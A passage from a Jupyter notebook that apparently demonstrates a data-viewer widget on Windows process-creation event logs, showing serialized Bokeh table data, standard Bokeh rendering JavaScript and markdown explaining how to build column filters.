05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362]},\"selected\":{\"id\":\"1495\"},\"selection_policy\":{\"id\":\"1496\"}},\"id\":\"1410\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1505\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1502\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1506\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1500\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1499\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1435\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1508\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1507\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1501\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1509\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1503\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1502\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1436\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1509\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1508\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1439\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1498\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1497\"},\"title\":\"Account\",\"width\":26},\"id\":\"1434\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1495\",\"type\":\"Selection\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1440\",\"type\":\"DateFormatter\"},{\"attributes\":{},\"id\":\"1504\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1503\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1501\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1440\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1441\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1500\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1499\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1410\"}},\"id\":\"1431\",\"type\":\"CDSView\"},{\"attributes\":{\"editor\":{\"id\":\"1507\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1506\"},\"title\":\"CommandLine\",\"width\":125},\"id\":\"1438\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1505\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1504\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1437\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1496\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1498\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1497\",\"type\":\"StringFormatter\"}],\"root_ids\":[\"1432\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n var render_items = [{\"docid\":\"25caf126-b665-444e-a299-743f1ce3b751\",\"notebook_comms_target\":\"1510\",\"root_ids\":[\"1432\"],\"roots\":{\"1432\":\"086121c8-90e0-4c74-b890-d337ac3ad073\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1432" } }, "output_type": "display_data" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "a4020984642c425391bd29b2819271f2", "version_major": 2, "version_minor": 0 }, "text/plain": [ "Accordion(children=(VBox(children=(VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle…" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "viewer = DataViewer(data, selected_cols=columns)\n", "# We're opening the \"Choose columns\" drop-down programmatically\n", "# Just click on the small arrow to the left of \"Choose columns\" to open this\n", "viewer.accordion.selected_index = 0\n", "viewer" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "# Filtering the data\n", "\n", "You can apply multiple filters - each filter is additive, i.e. each is logically ANDed with the others.\n", "\n", "The \"Filter data\" drop down shows the following controls:\n", "\n", "Filter expression editor\n", "- *Column selector* drop-down - which column you\n", " want the filter to apply to\n", "- *Not* checkbox - invert the logic of the filter (for this filter item only)\n", "- *Operator* drop-down - the available operators are different for string\n", " and non-string (numeric and dates)\n", "- *Expression* text box - type in the expression that you want to match\n", "- **Add filter** - adds the current filter items as a new filter expression to **Current filters**\n", "- **Update filter** - overwrites the selected filter in **Current filters** with the current filter expression\n", "\n", "Current filters\n", "- Select the filter expression you want to operate on from the **Filters** list\n", "- **Delete filter** deletes the selected item\n", "- **Clear all filters** removes all filter expressions\n", "- **Apply filter** - applies the filter items to the data and updates the display" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof 